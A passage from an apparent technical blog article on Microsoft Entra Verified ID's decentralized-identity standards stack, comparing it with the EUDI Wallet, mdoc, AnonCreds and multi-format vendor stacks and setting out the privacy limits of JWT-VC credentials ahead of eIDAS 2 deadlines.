A specification for a JSON file served at `/.well-known/did-configuration.json` that contains domain-linkage credentials, signed by a DID, asserting the DID owns the host domain. Used by `did:web` deployments to convert a domain-served DID Document into a verifiable two-way binding between the DNS name and the DID identifier [@well-known-did-config].

flowchart TD
    subgraph ION[&quot;ION resolution (G2, retired)&quot;]
        I1[Verifier wants issuer key] --&amp;gt; I2[Query ION node]
        I2 --&amp;gt; I3[Read Bitcoin anchor txn]
        I3 --&amp;gt; I4[Fetch Sidetree batch from IPFS]
        I4 --&amp;gt; I5[Replay operation history]
        I5 --&amp;gt; I6[Reconstruct DID Document]
    end
    subgraph WEB[&quot;did:web resolution (G4, current)&quot;]
        W1[Verifier wants issuer key] --&amp;gt; W2[&quot;HTTPS GET /.well-known/did.json&quot;]
        W2 --&amp;gt; W3[Parse JSON, read public key]
    end
&lt;p&gt;Two production deployments shipped on this architecture. LinkedIn Workplace Verification runs at the scale of hundreds of millions of LinkedIn profiles [@chik-linkedin-2023]. The NHS Digital Staff Passport ran on it across a four-Trust pilot, after migrating from a Sovrin-anchored architecture to &lt;code&gt;did:web&lt;/code&gt; [@dif-condatis-blog].&lt;/p&gt;
&lt;p&gt;A third, smaller deployment proved out the same stack for higher education: RMIT University engaged Condatis and Microsoft on a Proof of Value covering digital student cards, training-certificate issuance, and alumni-transcript verification on Entra Verified ID [@condatis-rmit]. Neither of the production-scale deployments would have shipped on ION; all three shipped on &lt;code&gt;did:web&lt;/code&gt;. The next question is what those deployments are doing under the hood.&lt;/p&gt;
&lt;h2&gt;6. The Stack Microsoft Ships in May 2026&lt;/h2&gt;
&lt;p&gt;The &quot;supported standards&quot; table on Microsoft Learn is the most honest single document Microsoft publishes about Verified ID. It lists exactly what ships and is silent on everything else [@ms-learn-supported]. Walking it row by row, in the order the wire flow uses each layer, gives the cleanest possible picture of the May 2026 product.&lt;/p&gt;
&lt;h3&gt;Identifier&lt;/h3&gt;
&lt;p&gt;&lt;code&gt;did:web&lt;/code&gt; only, with &lt;code&gt;did:web:path&lt;/code&gt; available on request since September 2024 [@ms-learn-whatsnew]. &lt;code&gt;did:ion&lt;/code&gt; is gone. &lt;code&gt;did:key&lt;/code&gt; and &lt;code&gt;did:jwk&lt;/code&gt; are not listed as trust systems. The Microsoft Resolver is scoped to &lt;code&gt;did:web&lt;/code&gt; [@ms-learn-intro].&lt;/p&gt;
&lt;h3&gt;Data model&lt;/h3&gt;
&lt;p&gt;W3C VC Data Model v1.1 (3 March 2022) [@w3c-vc-1-1]. Microsoft Entra Verified ID has not yet adopted v2.0, which became a W3C Recommendation on 15 May 2025 [@w3c-vc-2-0]. The one-version lag is documented and small in scope; v1.1 remains in widespread production use industry-wide.&lt;/p&gt;
&lt;h3&gt;Credential format&lt;/h3&gt;
&lt;p&gt;JWT-VC: a JSON payload signed under JWS (RFC 7515 [@rfc-7515]), encoded according to section 6.3.1 of the VC Data Model v1.1 [@w3c-vc-1-1]. JSON-LD Data Integrity Proofs are absent from Microsoft&apos;s supported-standards table. The fairest framing is that this is a documented omission rather than a public rejection; the consequence (no JSON-LD-native context handling, no canonicalisation step, no semantic web integration) is the same in either case.&lt;/p&gt;
&lt;h3&gt;Issuance protocol&lt;/h3&gt;
&lt;p&gt;OpenID for Verifiable Credential Issuance (OpenID4VCI). Microsoft Learn currently references Implementer Draft 11 of the specification [@ms-learn-supported]; the Final 1.0 was approved by the OpenID Foundation in September 2025 [@openid4vci-final-announce], with the spec itself at [@openid4vci-final-spec]. Final 1.0 is closely compatible with Draft 11 in the wire shape but tightens several optionalities.&lt;/p&gt;
&lt;p&gt;The OpenID4VCI version lag is a typical specification-implementation gap: the Final approval (102 approve votes, 1 object, 12 abstain [@openid4vci-final-announce]) came months after Microsoft built its current implementation. Final 1.0 conformance is a near-trivial update for any deployment already on Draft 11.&lt;/p&gt;

The OAuth-2.0-based protocol by which a credential issuer offers a Verifiable Credential to a wallet. The wallet redeems a one-time code (the *credential offer*) at a token endpoint, then presents the resulting access token at a credential endpoint to receive the signed credential. Final 1.0 approved September 2025 [@openid4vci-final-spec].
&lt;h3&gt;Presentation protocol&lt;/h3&gt;
&lt;p&gt;OpenID for Verifiable Presentations 1.0, Final, July 2025 [@openid4vp-final-announce] [@openid4vp-final-spec]. The verifier sends the wallet a &lt;code&gt;presentation_definition&lt;/code&gt; (using DIF Presentation Exchange semantics) and receives back a Verifiable Presentation containing one or more credentials.&lt;/p&gt;

A wallet-agnostic protocol for a verifier (relying party) to request a verifiable presentation from a wallet, using OAuth-2.0 redirect or cross-device QR/deep-link flows. Final 1.0 ratified July 2025 by 79 approve votes to 2 object and 17 abstain [@openid4vp-final-announce].
&lt;h3&gt;User-authentication leg&lt;/h3&gt;
&lt;p&gt;Self-Issued OpenID Provider v2 (SIOPv2), the OpenID-Connect-style layer that authenticates the holder to the verifier inside the OpenID4VP flow [@siop-v2].&lt;/p&gt;

The Self-Issued OpenID Provider v2 specification, which lets a wallet act as its own OpenID Connect issuer, signing an ID Token with the holder&apos;s key. The user-authentication leg of the OpenID-for-VC stack [@siop-v2].
&lt;h3&gt;Query language&lt;/h3&gt;
&lt;p&gt;DIF Presentation Exchange v2.0.0, ratified 3 November 2022 [@dif-pe-2]. The verifier expresses what it wants (&quot;a VC of type WorkplaceCredential issued by an issuer in this list&quot;); the wallet returns a presentation submission mapping its held credentials onto the request.&lt;/p&gt;
&lt;h3&gt;Domain binding&lt;/h3&gt;
&lt;p&gt;DIF Well-Known DID Configuration, as described in section 5 [@well-known-did-config]. The verifier downloads the issuer&apos;s &lt;code&gt;/.well-known/did-configuration.json&lt;/code&gt; and confirms the bidirectional binding between the DID and the DNS host.&lt;/p&gt;
&lt;h3&gt;Revocation&lt;/h3&gt;
&lt;p&gt;W3C VC Status List 2021. Microsoft Learn currently references the Working Draft &lt;code&gt;WD-vc-status-list-20230427&lt;/code&gt;; W3C has since published the Bitstring Status List Recommendation as the canonical evolution of the same bitstring revocation construction [@vc-bitstring-status]. Microsoft has not migrated to the Recommendation URL; the underlying mechanism is the same compressed bitstring construction in both.&lt;/p&gt;
&lt;h3&gt;Algorithms&lt;/h3&gt;
&lt;p&gt;ES256K (secp256k1, legacy, scheduled for deprecation 1 July 2026 [@ms-learn-whatsnew]), EdDSA, and ES256 (P-256, the default for credentials created after February 2024). All three are JWS algorithm identifiers; there are no algorithm choices outside the JOSE family.&lt;/p&gt;
&lt;h3&gt;Holder wallet&lt;/h3&gt;
&lt;p&gt;Microsoft Authenticator on iOS and Android. There is no third-party wallet support at GA [@ms-learn-intro].&lt;/p&gt;
&lt;h3&gt;Premium add-on&lt;/h3&gt;
&lt;p&gt;Face Check, an Azure AI face-matching service that scores a live selfie against a photo claim on the credential, available as a premium add-on. Face Check went GA on 12 August 2024 [@ms-learn-whatsnew] [@ms-learn-facecheck].&lt;/p&gt;
&lt;h3&gt;What is NOT in the table&lt;/h3&gt;
&lt;p&gt;The list of items Microsoft Learn does not list as supported is short and worth stating out loud: SD-JWT VC; BBS signatures; ISO/IEC 18013-5 mdoc; JSON-LD Data Integrity Proofs; selective disclosure of any kind; third-party wallets.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; Three of the items on the &quot;not supported&quot; list (SD-JWT VC, ISO mdoc, selective disclosure) are the same three items the European Union&apos;s EUDI Wallet ARF has just made mandatory for the EU regulated market [@eudi-arf]. The article&apos;s last third explains what happens when those two lists collide.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Layer&lt;/th&gt;
&lt;th&gt;Standard / version&lt;/th&gt;
&lt;th&gt;Source&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;&lt;tr&gt;
&lt;td&gt;Identifier&lt;/td&gt;
&lt;td&gt;&lt;code&gt;did:web&lt;/code&gt; (plus &lt;code&gt;did:web:path&lt;/code&gt; on request)&lt;/td&gt;
&lt;td&gt;Microsoft Learn DID overview [@ms-learn-intro]&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Data model&lt;/td&gt;
&lt;td&gt;W3C VC Data Model v1.1 (March 2022)&lt;/td&gt;
&lt;td&gt;W3C [@w3c-vc-1-1]&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Credential format&lt;/td&gt;
&lt;td&gt;JWT-VC (JWS over JSON, RFC 7515)&lt;/td&gt;
&lt;td&gt;RFC 7515 [@rfc-7515]; VC v1.1 §6.3.1 [@w3c-vc-1-1]&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Issuance protocol&lt;/td&gt;
&lt;td&gt;OpenID4VCI (Microsoft Learn: Implementer Draft 11)&lt;/td&gt;
&lt;td&gt;Final 1.0 [@openid4vci-final-spec]&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Presentation protocol&lt;/td&gt;
&lt;td&gt;OpenID4VP 1.0 (Microsoft Learn: OpenID4VC landing)&lt;/td&gt;
&lt;td&gt;Final 1.0 [@openid4vp-final-spec]&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Authentication leg&lt;/td&gt;
&lt;td&gt;SIOPv2&lt;/td&gt;
&lt;td&gt;OpenID Foundation [@siop-v2]&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Query language&lt;/td&gt;
&lt;td&gt;DIF Presentation Exchange v2.0.0&lt;/td&gt;
&lt;td&gt;DIF [@dif-pe-2]&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Domain binding&lt;/td&gt;
&lt;td&gt;DIF Well-Known DID Configuration&lt;/td&gt;
&lt;td&gt;DIF [@well-known-did-config]&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Revocation&lt;/td&gt;
&lt;td&gt;W3C VC Status List 2021 (WD-vc-status-list-20230427)&lt;/td&gt;
&lt;td&gt;Recommendation form: Bitstring Status List [@vc-bitstring-status]&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Algorithms&lt;/td&gt;
&lt;td&gt;ES256K (deprecating July 2026), EdDSA, ES256 (P-256, default)&lt;/td&gt;
&lt;td&gt;Microsoft Learn supported standards [@ms-learn-supported]&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Holder wallet&lt;/td&gt;
&lt;td&gt;Microsoft Authenticator (iOS, Android)&lt;/td&gt;
&lt;td&gt;Microsoft Learn DID overview [@ms-learn-intro]&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Premium add-on&lt;/td&gt;
&lt;td&gt;Face Check (Azure AI face matching, GA 12 Aug 2024)&lt;/td&gt;
&lt;td&gt;Microsoft Learn whats-new [@ms-learn-whatsnew]&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;p&gt;{&lt;code&gt;// Pseudocode for the verifier&apos;s job. A real implementation uses a JOSE library. async function verifyJwtVc(jwtVc) {   const [headerB64, payloadB64, sigB64] = jwtVc.split(&apos;.&apos;);   const header = JSON.parse(atob(headerB64));   const payload = JSON.parse(atob(payloadB64));   // 1. Pull the issuer DID from the VC payload.   const issuerDid = payload.iss || payload.vc.issuer;   // 2. Resolve did:web to a URL and fetch the DID document.   const url = didWebToUrl(issuerDid);   const didDoc = await fetch(url).then((r) =&amp;gt; r.json());   // 3. Find the verification method whose id matches the JWS kid.   const vm = didDoc.verificationMethod.find((m) =&amp;gt; m.id === header.kid);   const jwk = vm.publicKeyJwk;   // 4. Verify the JWS signature over header.payload using the JWK.   const ok = await joseVerify(headerB64 + &apos;.&apos; + payloadB64, sigB64, jwk);   // 5. Check the status list entry to confirm the VC is not revoked.   if (payload.vc.credentialStatus) await checkStatusList(payload.vc.credentialStatus);   return ok; }&lt;/code&gt;}&lt;/p&gt;
&lt;p&gt;The verifier needs a JOSE library and an HTTPS client. That is the whole moving-parts inventory. The simplicity is precisely what won.&lt;/p&gt;

sequenceDiagram
    participant Iss as Issuer Backend
    participant Auth as Microsoft Authenticator
    participant Ver as Verifier
    participant DNS as Issuer did:web host
    Iss-&amp;gt;&amp;gt;Auth: OpenID4VCI credential offer
    Auth-&amp;gt;&amp;gt;Iss: redeem code, request credential
    Iss-&amp;gt;&amp;gt;Auth: signed JWT-VC
    Note over Auth: wallet stores VC
    Ver-&amp;gt;&amp;gt;Auth: OpenID4VP presentation_definition
    Auth-&amp;gt;&amp;gt;Ver: VP JWT containing VC
    Ver-&amp;gt;&amp;gt;DNS: HTTPS GET /.well-known/did.json
    DNS-&amp;gt;&amp;gt;Ver: DID Document with issuer JWK
    Ver-&amp;gt;&amp;gt;Ver: verify VC signature, check status list
    Ver-&amp;gt;&amp;gt;Auth: accept or reject
&lt;h2&gt;7. The Other Wallets Microsoft Has to Live With&lt;/h2&gt;
&lt;p&gt;Microsoft Entra Verified ID is not the only wallet a relying party in 2026 has to think about. There are four competing stacks, each with a different theory of where the trust root sits, and each of them is shipping in production today.&lt;/p&gt;
&lt;h3&gt;M-B: The EUDI Wallet (European Union)&lt;/h3&gt;
&lt;p&gt;The EU&apos;s European Digital Identity Wallet is a regulatory product, not a single vendor&apos;s product. Regulation (EU) 2024/1183 (eIDAS 2) requires every Member State to provision at least one wallet within 24 months of the relevant implementing acts entering into force, and to lift mandatory private-sector acceptance to all regulated relying parties 18 months after that [@eidas-2].&lt;/p&gt;
&lt;p&gt;The EUDI Architecture and Reference Framework, currently published as v2.9 (May 2026), mandates two baseline credential formats: SD-JWT VC (a draft IETF profile on top of the SD-JWT primitive, RFC 9901 [@rfc-9901] [@sd-jwt-vc-draft]) and ISO/IEC 18013-5 mobile documents (mdoc) [@iso-18013-5] [@eudi-arf] [@eudi-arf-2-9]. BBS-style unlinkable signatures are listed as optional and future.&lt;/p&gt;

A Verifiable Credential profile that splits each disclosable claim into a salted hash inside the signed JWT, with the salt-and-value pairs released to verifiers a la carte. Built on the SD-JWT primitive (RFC 9901, November 2025 [@rfc-9901]), defined by the IETF OAuth working group draft `draft-ietf-oauth-sd-jwt-vc` (current revision draft-16, 24 April 2026, submitted to the IESG for publication [@sd-jwt-vc-draft]). Gives selective disclosure but not unlinkability across presentations.

The ISO/IEC 18013-5:2021 standard for mobile driver&apos;s licences, defining a CBOR-encoded credential format with selective disclosure of individual data elements and a CTAP-style cross-device presentation protocol [@iso-18013-5]. ISO/IEC TS 18013-7, published 7 October 2024, adds an online-presentation profile for the same mdoc format [@iso-18013-7] [@aamva-iso-alert].
&lt;p&gt;The trust-list machinery is set out in Commission Implementing Regulation (EU) 2025/849, which requires each Member State to publish its list of certified wallet solutions in machine-readable form for inclusion in a consolidated EU list [@eur-lex-cir-2025-849]. Four EU-funded Large-Scale Pilots are exercising the architecture: POTENTIAL (general public services), DC4EU (digital credentials for education), EWC (cross-border wallet interop), and NOBID (Nordic-Baltic payments) [@potential-lsp] [@dc4eu-lsp] [@nobid-lsp].&lt;/p&gt;
&lt;h3&gt;M-C: Apple Wallet ID-in-Wallet and Google Wallet Digital ID&lt;/h3&gt;
&lt;p&gt;The two consumer mobile-OS wallets converge on ISO/IEC 18013-5 mdoc as the credential format and X.509 IACA (Issuing Authority Certificate Authority) trust chains as the trust root [@iso-18013-5]. In-person presentation uses the QR-plus-BLE handover defined by ISO/IEC 18013-5; the new online-presentation profile is defined by ISO/IEC TS 18013-7, with an AAMVA Special Alert published on the October 2024 release [@iso-18013-7] [@aamva-iso-alert].&lt;/p&gt;
&lt;p&gt;In North America, the AAMVA Digital Trust Service (DTS) operates the public-key trust list for state-issued mDLs [@movemag-mdl] [@aamva-mdl-guidelines]. The California DMV&apos;s TruAge consumer feature, built on SpruceID, is the visible North American example of an mDL-in-wallet age-verification flow [@dmv-ca-truage]. The Secure Technology Alliance maintains a public tracker of mDL implementation status state by state [@mdl-tracker]. Inclusion in Apple Wallet or Google Wallet is platform-mediated.&lt;/p&gt;
&lt;p&gt;The AAMVA DTS is the United States analogue of the EUDI Trust List. The architectural lesson is the same in both: a federated wallet model requires a public, signed, machine-readable list of which issuers a relying party should accept, and somebody has to operate that list. Microsoft Entra Verified ID currently relies on per-tenant verifier configuration to fulfil the same role [@movemag-mdl].&lt;/p&gt;
&lt;h3&gt;M-D: Hyperledger Aries and AnonCreds&lt;/h3&gt;
&lt;p&gt;The SSI-purist lineage is alive and shipping, just not at Microsoft. AnonCreds v1.0 is the current canonical specification, hosted at the AnonCreds Working Group&apos;s GitHub Pages site after the move from Hyperledger to LF Decentralized Trust [@anoncreds-spec]. The cryptographic core is documented in the Khovratovich, Lodder, and Parra Ursa AnonCreds paper [@ursa-anoncreds].&lt;/p&gt;
&lt;p&gt;The credential is issued under a Camenisch-Lysyanskaya or BBS-style signature. Presentations use a zero-knowledge proof that re-randomises the signature, delivering unlinkability across presentations as a theorem rather than as a best-effort engineering claim. DIDComm v2 is the transport, offering a peer-to-peer messaging substrate that does not depend on HTTPS redirects [@didcomm-spec]. Type-3 cryptographic accumulators handle revocation at scale without leaking the holder&apos;s identity to the issuer.&lt;/p&gt;
&lt;p&gt;The trade-offs are presentation latency in the tens to low hundreds of milliseconds, proof sizes in the kilobytes, and a smaller pool of conformant verifier implementations than the OpenID4VP world has.&lt;/p&gt;
&lt;h3&gt;M-E: Third-party multi-format vendors&lt;/h3&gt;
&lt;p&gt;Mattr, SpruceID, and Trinsic each ship issuers and verifiers that handle multiple formats (SD-JWT VC, JWT-VC, ISO mdoc, BBS-VC) over the same OpenID4VP transport.&lt;/p&gt;
&lt;p&gt;Mattr powers the New Zealand Department of Internal Affairs&apos; NZ Verify product, which checks ISO 18013-5 mobile driver licences from 18 US states, Puerto Rico, and Queensland [@dia-nzverify]. SpruceID&apos;s Success Stories list names the California DMV, the Utah Department of Government Operations, and the U.S. Department of Homeland Security as headline deployments [@spruceid-success], with the DHS Silicon Valley Innovation Program write-up at [@spruceid-dhs]. Trinsic announced a February 2026 partnership with IDEMIA Public Security to accept mDLs across New York, Arkansas, Iowa, West Virginia, and Kentucky [@trinsic-idemia] [@prnewswire-trinsic].&lt;/p&gt;
&lt;p&gt;These vendors are the parties who, if Microsoft does not add SD-JWT VC or mdoc issuance to Entra Verified ID, will fill the EUDI-interop gap for Microsoft-tenant relying parties.&lt;/p&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Stack&lt;/th&gt;
&lt;th&gt;Credential format(s)&lt;/th&gt;
&lt;th&gt;Identifier&lt;/th&gt;
&lt;th&gt;Selective disclosure&lt;/th&gt;
&lt;th&gt;Unlinkability&lt;/th&gt;
&lt;th&gt;Trust root&lt;/th&gt;
&lt;th&gt;Wallet pluralism&lt;/th&gt;
&lt;th&gt;EU regulatory mandate&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;&lt;tr&gt;
&lt;td&gt;M-A Entra Verified ID&lt;/td&gt;
&lt;td&gt;JWT-VC&lt;/td&gt;
&lt;td&gt;&lt;code&gt;did:web&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;No&lt;/td&gt;
&lt;td&gt;No&lt;/td&gt;
&lt;td&gt;DNS + CA&lt;/td&gt;
&lt;td&gt;Microsoft Authenticator only&lt;/td&gt;
&lt;td&gt;No&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;M-B EUDI Wallet&lt;/td&gt;
&lt;td&gt;SD-JWT VC + mdoc&lt;/td&gt;
&lt;td&gt;Implementation-dependent&lt;/td&gt;
&lt;td&gt;Yes (hash-based; selective on mdoc)&lt;/td&gt;
&lt;td&gt;No baseline (BBS optional/future)&lt;/td&gt;
&lt;td&gt;Member-State trust lists&lt;/td&gt;
&lt;td&gt;Yes, by design&lt;/td&gt;
&lt;td&gt;Mandatory by 24 Dec 2026&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;M-C Apple/Google Wallet&lt;/td&gt;
&lt;td&gt;ISO mdoc&lt;/td&gt;
&lt;td&gt;X.509 IACA&lt;/td&gt;
&lt;td&gt;Yes (selective on mdoc)&lt;/td&gt;
&lt;td&gt;No&lt;/td&gt;
&lt;td&gt;AAMVA DTS / IACA chain&lt;/td&gt;
&lt;td&gt;Platform-mediated&lt;/td&gt;
&lt;td&gt;Possible interop, not mandated&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;M-D Aries / AnonCreds&lt;/td&gt;
&lt;td&gt;CL or BBS over JSON&lt;/td&gt;
&lt;td&gt;&lt;code&gt;did:indy&lt;/code&gt;, &lt;code&gt;did:peer&lt;/code&gt;, etc.&lt;/td&gt;
&lt;td&gt;Yes&lt;/td&gt;
&lt;td&gt;Yes&lt;/td&gt;
&lt;td&gt;Permissioned ledger or DID network&lt;/td&gt;
&lt;td&gt;Multiple Aries wallets&lt;/td&gt;
&lt;td&gt;Optional under EUDI ARF&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;M-E Multi-format vendors&lt;/td&gt;
&lt;td&gt;SD-JWT VC, JWT-VC, mdoc, BBS-VC&lt;/td&gt;
&lt;td&gt;&lt;code&gt;did:web&lt;/code&gt;, &lt;code&gt;did:jwk&lt;/code&gt;, &lt;code&gt;did:key&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Yes (format-dependent)&lt;/td&gt;
&lt;td&gt;Yes when BBS&lt;/td&gt;
&lt;td&gt;Per-deployment&lt;/td&gt;
&lt;td&gt;Vendor or government-issued&lt;/td&gt;
&lt;td&gt;Optional&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;

The eIDAS 2 deadlines reach beyond the EU&apos;s borders in two ways.&lt;p&gt;First, any non-EU enterprise that sells regulated services into the EU (banks, telecoms, large online platforms, transport) becomes an obligated relying party that must accept EUDI Wallet presentations once the private-sector acceptance window closes [@eidas-2].&lt;/p&gt;
&lt;p&gt;Second, the EUDI ARF&apos;s baseline format choice creates a gravitational field for every vendor that wants to ship a single wallet across multiple jurisdictions. The AAMVA mdoc story in the United States [@aamva-iso-alert] is converging on the same on-the-wire shape the EUDI ARF mandates [@eudi-arf]. The &quot;two parallel formats&quot; world is rapidly becoming &quot;one format the EU mandated and one format the rest of the world also picked.&quot; Microsoft&apos;s current JWT-VC commitment sits outside both.
&lt;/p&gt;&lt;p&gt;&lt;/p&gt;
&lt;p&gt;Four stacks, four trust roots, four credential formats. The technical layer is converging on OpenID4VP. The format layer is fragmenting. The trust-framework layer (which issuers are authoritative for which credentials in which jurisdiction) is still wide open.&lt;/p&gt;
&lt;h2&gt;8. The Theoretical Limits of Atomic JWT-VC&lt;/h2&gt;
&lt;p&gt;There are three things JWT-VC cannot do that the original 2019 vision said the new architecture would do. None of the three is a bug. All three are theorems about the format.&lt;/p&gt;
&lt;h3&gt;Concession 1: No selective disclosure&lt;/h3&gt;
&lt;p&gt;A JWS computes a signature over a fixed payload [@rfc-7515]. To verify, the verifier reconstructs the exact bytes that were signed, recomputes the signature, and compares. If even one bit of the payload changes, verification fails. That property is what makes the JWS authentic; it is also what makes selective disclosure impossible inside a JWT-VC. You reveal every claim, or none.&lt;/p&gt;
&lt;p&gt;The two production-ready ways to escape this constraint each pick a different cryptographic trick. SD-JWT VC keeps the signature whole but replaces each disclosable claim in the signed payload with a salted SHA-256 hash; the verifier receives the salt-value pairs only for the claims the holder chooses to disclose, and recomputes the hashes to confirm they appear in the signed payload [@rfc-9901] [@sd-jwt-vc-draft]. BBS signatures go further: the holder can re-randomise the signature itself at presentation time and prove knowledge of a signature on a subset of messages without ever revealing the original signature [@bbs-draft-10].&lt;/p&gt;
&lt;p&gt;Both routes change the on-the-wire format. Neither is reachable from inside JWT-VC. Microsoft&apos;s &quot;no selective disclosure today&quot; is therefore a format-migration decision, not a cryptographic engineering decision. The &lt;a href=&quot;https://paragmali.com/blog/the-age-gate-that-doesnt-know-your-age-how-anonymous-credent/&quot; rel=&quot;noopener&quot;&gt;Anonymous Credentials&lt;/a&gt; companion article treats the mathematical structure of the three families (hash-disclosure, CL signatures, BBS signatures) in depth.&lt;/p&gt;
&lt;h3&gt;Concession 2: Linkability across presentations&lt;/h3&gt;
&lt;p&gt;The same JWT-VC presented to two different verifiers produces two bit-identical signed payloads. The signature itself is a &lt;em&gt;global correlator&lt;/em&gt;: any pair of verifiers who collude can match the two presentations to the same holder credential, and a single verifier who sees the holder&apos;s presentation twice can match the holder across the two events. SD-JWT VC and mdoc both inherit this property; only signature schemes that re-randomise at presentation time defeat it.&lt;/p&gt;
&lt;p&gt;The escape route is a positive construction, not an impossibility result. The Camenisch and Lysyanskaya 2004 paper on signatures from bilinear maps [@cl-paper-iacr] showed how to build anonymous credentials that dodge the constraint: each presentation is a fresh zero-knowledge proof of knowledge of a signature, not a transcript of the signature itself. The CL family (and its BBS descendant) costs presentation latency in the tens to low hundreds of milliseconds and a verifier that needs more than a JOSE library. The payoff is that unlinkability becomes a theorem of the protocol rather than a line in a privacy policy.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; If the bytes the verifier checks are deterministic in the issued credential and the disclosed subset of attributes, then two verifiers who see the same disclosure see the same bytes; unlinkability requires the verifier to check something fresh per presentation, which means re-randomising the signature, which JWS does not do.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;h3&gt;Concession 3: DNS as the trust root&lt;/h3&gt;
&lt;p&gt;&lt;code&gt;did:web&lt;/code&gt; inherits DNS and the X.509 certificate-authority system as its security base. A registrar suspension can erase any issuer&apos;s DID; a certificate-authority mis-issuance can let an attacker publish a competing DID document at the same identifier; a DNS cache poisoning can redirect resolution. The W3C &lt;code&gt;did:web&lt;/code&gt; Security and Privacy Considerations state this inheritance directly, naming DNS and TLS as the load-bearing layers [@did-web-spec]. SSI advocates point to this as the single largest concession compared to a ledger-anchored trust root, and they have a point: the two cannot be combined inside one DID document.&lt;/p&gt;

DNS presents many of the attack vectors that enable active security and privacy attacks on the did:web method and it&apos;s important that implementors address these concerns via proper configuration of DNS. -- W3C `did:web` Method Specification, DNS Security Considerations [@did-web-spec]
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Property&lt;/th&gt;
&lt;th&gt;2019 vision claim&lt;/th&gt;
&lt;th&gt;2026 product reality&lt;/th&gt;
&lt;th&gt;Reason for the trade&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;&lt;tr&gt;
&lt;td&gt;Permissionless anchoring&lt;/td&gt;
&lt;td&gt;ION on Bitcoin&lt;/td&gt;
&lt;td&gt;&lt;code&gt;did:web&lt;/code&gt; (DNS + CA)&lt;/td&gt;
&lt;td&gt;Enterprise issuers already had DNS reputation; ION solved a non-problem&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Open credential format&lt;/td&gt;
&lt;td&gt;JSON-LD Data Integrity&lt;/td&gt;
&lt;td&gt;JWT-VC (JWS over JSON)&lt;/td&gt;
&lt;td&gt;JOSE library ubiquity; canonicalisation cost&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Selective disclosure&lt;/td&gt;
&lt;td&gt;BBS or hash-based&lt;/td&gt;
&lt;td&gt;None at GA&lt;/td&gt;
&lt;td&gt;Format-migration cost not yet paid&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Unlinkability across presentations&lt;/td&gt;
&lt;td&gt;Re-randomised signatures&lt;/td&gt;
&lt;td&gt;None&lt;/td&gt;
&lt;td&gt;JWS is a global correlator&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Wallet pluralism&lt;/td&gt;
&lt;td&gt;Any conformant wallet&lt;/td&gt;
&lt;td&gt;Microsoft Authenticator only&lt;/td&gt;
&lt;td&gt;UX, support, and security review surface&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Offline verifier&lt;/td&gt;
&lt;td&gt;Yes, after one key fetch&lt;/td&gt;
&lt;td&gt;Yes (for did:web)&lt;/td&gt;
&lt;td&gt;Achieved; cached &lt;code&gt;did.json&lt;/code&gt; is the verifier state&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Key idea:&lt;/strong&gt; The three things JWT-VC cannot do (selective disclosure, unlinkability, ledger-anchored trust) are not bugs in Microsoft&apos;s implementation. They are theorems about the format. Any vendor who picked JWT-VC inherited the same three concessions. The gap between the 2019 promise and the 2026 product is a fixed-format trade-off, not a Microsoft engineering shortfall.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;Two of the three concessions can be fixed in the format layer. SD-JWT VC and BBS exist. The third cannot be fixed without a ledger anchor or an alternative trust root, and the operational case for that alternative is the one ION lost. The question for the EUDI roadmap is whether Microsoft will adopt the format-layer fixes, and whether the third concession is one Microsoft now considers a feature of the operational model rather than a cost.&lt;/p&gt;
&lt;h2&gt;9. Open Problems and the EUDI Deadline&lt;/h2&gt;
&lt;p&gt;On 24 December 2026, every EU Member State must have provisioned at least one European Digital Identity Wallet. Eighteen months later, on 6 December 2027, every regulated private-sector relying party in the EU must accept presentations from those wallets [@eidas-2]. Microsoft Entra Verified ID currently issues neither of the two credential formats the EUDI ARF mandates.&lt;/p&gt;
&lt;p&gt;That single regulatory clock is the spine of every open problem the product faces. There are five.&lt;/p&gt;
